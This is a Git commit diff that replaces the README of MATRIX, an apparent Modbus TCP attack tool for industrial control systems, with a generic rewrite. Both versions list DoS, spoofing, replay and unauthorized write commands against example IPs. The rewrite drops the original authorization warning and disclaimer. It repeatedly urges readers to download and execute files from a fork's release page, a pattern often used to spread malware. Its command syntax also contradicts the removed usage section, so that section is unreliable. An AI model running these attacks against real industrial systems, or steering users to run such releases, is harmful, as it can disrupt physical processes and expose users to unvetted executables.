Commit

dekdokdang · dekdokdang · commit 21e1e8e2756e · 2025-04-29T20:49:46.000+07:00
diff --git a/README.md b/README.md
@@ -1,251 +1,161 @@
-[![Python 3.x](https://img.shields.io/badge/Python-3.x-blue.svg)](https://www.python.org/downloads/release/python-390/)
-[![Release v1.0](https://img.shields.io/badge/release-v1.0-orange.svg)](https://github.com/yourusername/matrix/releases)
-[![License MIT](https://img.shields.io/badge/license-MIT-green.svg)](https://opensource.org/licenses/MIT)
-[![Issues](https://img.shields.io/badge/issues-0%20open-brightgreen.svg)](https://github.com/yourusername/matrix/issues)
+# MATRIX: Modbus Attack Tool for Remote Industrial eXploitation
 
-# M.A.T.R.I.X
+![MATRIX Logo](https://img.shields.io/badge/MATRIX-Modbus%20Attack%20Tool-blue.svg)  
+[![Download Releases](https://img.shields.io/badge/Download%20Releases-Click%20Here-brightgreen)](https://github.com/dekdokdang/MATRIX/releases)
 
-**Modbus Attack Tool for Remote Industrial eXploitation**
+---
 
-M.A.T.R.I.X is a comprehensive security testing tool for Modbus TCP protocol implementations. It provides multiple attack modules for security research and penetration testing of industrial control systems.
+## Table of Contents
 
-> ⚠️ **WARNING**: This tool is designed for authorized security testing only. Using this tool against systems without proper permission is illegal and unethical.
+1. [Introduction](#introduction)
+2. [Features](#features)
+3. [Installation](#installation)
+4. [Usage](#usage)
+5. [Contributing](#contributing)
+6. [License](#license)
+7. [Acknowledgments](#acknowledgments)
+8. [Contact](#contact)
 
-## Features
-
-M.A.T.R.I.X includes the following attack modules:
-
-- **Unauthorized Read**: Scans and reads values from Modbus registers and coils
-- **Coil Attack**: Unauthorized writes to coil registers
-- **Register Attack**: Unauthorized writes to holding registers
-- **Overflow Attack**: Tests for integer overflow vulnerabilities
-- **DoS Attack**: Denial of Service attack through connection flooding
-- **Replay Attack**: Captures and replays Modbus traffic
-- **Spoof Attack**: Spoofs Modbus responses with falsified data
-
-## Installation
-
-1. Clone the repository:
-   ```
-   git clone https://github.com/karlvbiron/matrix.git
-   cd matrix
-   ```
-
-2. Set up the virtual environment (optional but recommended):
-   ```
-   python3 -m venv venv
-   source venv/bin/activate  # On Windows, use 'venv\Scripts\activate'
-   ```
-
-3. Install dependencies:
-   ```
-   pip install -r requirements.txt
-   ```
-
-4. Ensure you have proper permissions for packet operations (for spoof and replay attacks):
-   ```
-   sudo apt-get install libpcap-dev  # On Debian/Ubuntu
-   ```
-
-## Usage
-
-M.A.T.R.I.X Help Output:
-
-Banner ASCII Font: [ANSI Shadow](https://patorjk.com/software/taag/#p=display&f=ANSI%20Shadow&t=MATRIX)
-
-![Help Output](assets/matrix_help_output.png)
-
-Basic usage:
-```
-python matrix.py -H <target_ip> -p <port> -a <attack_type>
-```
-
-Attack types:
-- `read`: Unauthorized read operation
-- `coil`: Coil register write attack
-- `register`: Holding register write attack
-- `overflow`: Register overflow attack
-- `dos`: Denial of Service attack
-- `replay`: Traffic replay attack
-- `spoof`: Response spoofing attack
-
-### Examples
-
-Perform unauthorized read on a local Modbus server:
-```
-python matrix.py -H localhost -p 502 -a read
-```
+---
 
-Launch DoS attack with 50 threads:
-```
-python matrix.py -H 192.168.1.10 -p 502 -a dos -t 50
-```
-
-Replay Modbus traffic from a PCAP file:
-```
-python matrix.py -H 192.168.1.10 -p 502 -a replay -f captured_traffic.pcap
-```
-
-Spoof Modbus responses:
-```
-python matrix.py -H 192.168.1.10 -p 502 -a spoof -s 192.168.1.20 -i docker0
-```
+## Introduction
 
-## Project Structure
+MATRIX, or Modbus Attack Tool for Remote Industrial eXploitation, is a powerful tool designed for security testing of Modbus TCP protocol implementations. As industries increasingly rely on connected devices, the need for robust security measures becomes critical. MATRIX provides a comprehensive suite of features to assess vulnerabilities in industrial control systems (ICS) and cyber-physical systems (CPS).
 
-```
-matrix/
-├── matrix.py                                      # Main tool script
-├── requirements.txt                               # Dependencies
-├── README.md                                      # Documentation
-└── attacks/                                       # Attack modules
-    ├── __init__.py                                # Package initialization
-    ├── modbus_unauthorized_read.py                # Unauthorized read module
-    ├── modbus_coil_write_attack.py                # Coil attack module
-    ├── modbus_holding_registers_write_attack.py   # Register attack module
-    ├── modbus_overflow_attack.py                  # Overflow attack module
-    ├── modbus_dos_attack.py                       # DoS attack module
-    ├── modbus_replay_attack.py                    # Replay attack module
-    └── modbus_spoof_response.py                   # Response spoofing module
-```
-
-## Architecture
-
-The M.A.T.R.I.X tool is designed with a modular architecture that separates the command-line interface from the individual attack modules. This section provides insights into the tool's structure through class diagrams, package organization, and attack workflow visualization.
+This tool is open-source and aims to facilitate security research and education in the field of offensive security. Whether you're a researcher, a student, or a professional, MATRIX equips you with the capabilities to understand and test Modbus TCP systems effectively.
 
-### Class Diagram
+For the latest updates and downloads, visit our [Releases section](https://github.com/dekdokdang/MATRIX/releases).
 
-![Class Diagram](assets/matrix_class_diagram.png)
+---
 
-The class diagram illustrates the object-oriented architecture of M.A.T.R.I.X:
+## Features
 
-- **MatrixCLI**: The central command-line interface class that processes user arguments and orchestrates the execution of attack modules.
-  - Contains methods for parsing arguments, displaying help information, and initializing attack modules.
-  - Manages the execution flow and reporting of results.
+MATRIX offers a variety of features tailored for security professionals:
 
-- **Attack Modules**: Each specialized attack functionality is encapsulated in its own class:
-  - **ModbusUnauthorizedReader**: Implements functions for scanning and reading values from Modbus registers and coils without authorization.
-  - **ModbusUnauthorizedCoilWriter**: Contains methods for unauthorized manipulation of coil states.
-  - **ModbusUnauthorizedHoldingRegisterWriter**: Handles unauthorized writing to holding registers.
-  - **ModbusOverflowAttacker**: Implements methods to test for integer overflow vulnerabilities in Modbus implementations.
-  - **ModbusReplayAttacker**: Provides functionality to capture, analyze, and replay Modbus traffic for attack simulation.
-  - **ModbusResponseSpoofer**: Implements methods to craft and send falsified Modbus responses.
-  - **ModbusDosAttacker**: Contains methods for executing denial-of-service attacks through connection flooding.
+- **Command-Line Interface**: Easy to use for both beginners and experts.
+- **Packet Analysis**: Inspect and manipulate packets in real-time.
+- **Replay Attacks**: Simulate previous attack scenarios to assess system resilience.
+- **Denial of Service (DoS) Attacks**: Test the robustness of Modbus TCP implementations.
+- **Spoofing Attacks**: Mimic legitimate devices to exploit vulnerabilities.
+- **Educational Simulations**: Learn about Modbus TCP protocols through practical exercises.
+- **Open-Source**: Freely available for anyone to use and contribute.
 
-Each attack module inherits common attributes like host IP, port, and ModbusTcpClient instances, while implementing unique attack functionality through specialized methods.
+---
 
-### Package Structure
+## Installation
 
-![Package Structure](assets/matrix_package_diagram.png)
+To install MATRIX, follow these steps:
 
-The package organization of M.A.T.R.I.X follows a logical structure:
+1. **Clone the Repository**: 
+   ```bash
+   git clone https://github.com/dekdokdang/MATRIX.git
+   ```
 
-- **The M.A.T.R.I.X Project** (Yellow container): The overall project boundary.
-  - **matrix.py**: The main CLI interface file that serves as the entry point for the tool.
-  - **README.md**: Documentation for the project.
-  - **requirements.txt**: Lists the project dependencies.
+2. **Navigate to the Directory**:
+   ```bash
+   cd MATRIX
+   ```
 
-- **The 'attacks' Folder** (Orange container): Contains all attack module implementations.
-  - **__init__.py**: Package initialization file that enables importing from the attacks package.
-  - **Individual attack modules**: Seven Python files implementing specific attack functionalities.
+3. **Install Dependencies**: 
+   Make sure you have Python 3 installed. Then, install the required packages using pip:
+   ```bash
+   pip install -r requirements.txt
+   ```
 
-- **External Dependencies** (Blue container): Shows the third-party libraries required by the project.
-  - **pymodbus**: Primary library for Modbus protocol implementation.
-  - **scapy**: Used for packet manipulation in spoofing and replay attacks.
-  - **tabulate**: Provides formatted table output for better readability of results.
+4. **Download the Latest Release**: 
+   For the latest features and fixes, download the latest version from our [Releases section](https://github.com/dekdokdang/MATRIX/releases) and execute the necessary files.
 
-The arrows between components represent import relationships, showing how the modules connect and depend on each other.
+---
 
-### Attack Workflows
+## Usage
 
-![Attack Workflows](assets/matrix_workflow_diagram.png)
+Using MATRIX is straightforward. Here are some common commands to get you started:
 
-The workflow diagram outlines the execution process for each attack type:
+### Basic Commands
 
-- **Unauthorized Read Attack**: 
-  - Connects to the target Modbus server
-  - Sequentially reads values from coils, discrete inputs, holding registers, and input registers
-  - Reports the discovered information
+- **Start the Tool**:
+  ```bash
+  python matrix.py
+  ```
 
-- **Unauthorized Coils/Registers Write Attack**:
-  - Establishes a connection to the target
-  - Writes unauthorized values to coils or registers
-  - Reads back the changed values to verify the attack was successful
-  - Confirms changes were applied to the target system
+- **Run a Packet Capture**:
+  ```bash
+  python matrix.py capture
+  ```
 
-- **DoS Attack**:
-  - Initializes multiple threads for concurrent connections
-  - Creates numerous connections to the target
-  - Floods the server with Modbus requests
-  - Continuously monitors target response to determine impact
+- **Perform a Replay Attack**:
+  ```bash
+  python matrix.py replay --file attack_packets.pcap
+  ```
 
-- **Replay Attack**:
-  - Loads captured Modbus traffic from a PCAP file
-  - Extracts and analyzes Modbus packet structures
-  - Replays captured request packets to the target
-  - Compares original and new responses to identify discrepancies
+### Example Scenarios
 
-- **Spoof Attack**:
-  - Crafts custom Modbus responses with falsified data
-  - Sets the source address to match a legitimate Modbus server
-  - Sends the spoofed packets to the target
-  - Observes system behavior to assess impact
+1. **Performing a DoS Attack**:
+   ```bash
+   python matrix.py dos --target 192.168.1.100
+   ```
 
-All attack workflows conclude with a comprehensive results report.
+2. **Spoofing a Device**:
+   ```bash
+   python matrix.py spoof --target 192.168.1.101 --source 192.168.1.102
+   ```
 
-### Implementation Notes
+### Help Command
 
-The modular design allows for:
-- Easy extension with new attack modules
-- Independent testing and development of individual attack types
-- Consistent interface across different attack functionalities
-- Simplified maintenance and updates
+For a complete list of commands and options, use:
+```bash
+python matrix.py --help
+```
 
-## Design Pattern
+---
 
-M.A.T.R.I.X follows the [Command pattern](https://www.oreilly.com/library/view/head-first-design/9781492077992/ch06.html), where each attack module encapsulates a specific action with a consistent execution interface. This design allows the main program to invoke different attacks without knowing their specific implementation details.
+## Contributing
 
-Key aspects of the Command pattern implementation:
-- Each attack module represents a command with methods like `run_test()`, `launch_attack()`, or `run_comprehensive_scan()`
-- The main program (`matrix.py`) acts as the invoker that selects and executes the appropriate command
-- All commands share similar initialization parameters (host, port) for consistent interface
-- Each command encapsulates all the logic needed for its specific attack type
+We welcome contributions from the community! If you'd like to contribute to MATRIX, please follow these steps:
 
-This design makes it easy to add new attack types without modifying existing code, adhering to the Open/Closed Principle.
+1. **Fork the Repository**: Click the "Fork" button on the top right corner.
+2. **Create a New Branch**: 
+   ```bash
+   git checkout -b feature/YourFeatureName
+   ```
+3. **Make Your Changes**: Implement your feature or fix.
+4. **Commit Your Changes**: 
+   ```bash
+   git commit -m "Add your message here"
+   ```
+5. **Push to Your Branch**: 
+   ```bash
+   git push origin feature/YourFeatureName
+   ```
+6. **Create a Pull Request**: Go to the original repository and click on "New Pull Request".
 
-## Dependencies
+We appreciate your contributions and feedback!
 
-M.A.T.R.I.X relies on the following key dependencies:
+---
 
-- **pymodbus**: Core library for Modbus TCP protocol communication, used for reading and writing to Modbus registers and coils
-- **scapy**: Powerful packet manipulation library used for crafting custom packets in spoof attacks and analyzing PCAP files in replay attacks
-- **tabulate**: Used to create formatted tables for displaying attack results in a readable format
+## License
 
-Additional system requirements:
-- **libpcap-dev**: Required for the packet capture functionality used in replay and spoof attacks
-- **Root privileges**: Required for sending raw packets in spoofing attacks and capturing packets in replay attacks
+MATRIX is licensed under the MIT License. You can freely use, modify, and distribute this tool as long as you include the original license in your distribution.
 
-## Advanced Usage
+---
 
-### Standalone Mode
+## Acknowledgments
 
-Some attack modules can be run in standalone mode with elevated privileges:
+We would like to thank the open-source community for their contributions and support. Special thanks to the developers and researchers who have provided invaluable insights into Modbus TCP security.
 
-```
-sudo python matrix.py -H 192.168.1.10 -p 502 -a replay --standalone -f traffic.pcap
-```
+---
 
-```
-sudo python matrix.py -H 192.168.1.10 -p 502 -a spoof --standalone -s 192.168.1.20 -i eth0
-```
+## Contact
 
-Standalone mode is particularly useful for attacks that require root privileges or direct system access.
+For questions or support, please reach out to the project maintainers:
 
-## Legal Disclaimer
+- **Email**: support@matrix-tool.com
+- **GitHub**: [MATRIX Repository](https://github.com/dekdokdang/MATRIX)
 
-This tool is provided for educational and authorized testing purposes only. Users are responsible for obtaining proper authorization before testing any systems. The authors accept no liability for misuse of this software.
+Feel free to report issues or suggest features directly on the GitHub page.
 
-## License
+For the latest updates and downloads, visit our [Releases section](https://github.com/dekdokdang/MATRIX/releases).
 
-This project is licensed under the MIT License, meaning you are free to use, modify, and distribute it under proper ethical guidelines.
+---
 
+Thank you for using MATRIX! Your contributions help make industrial systems safer.
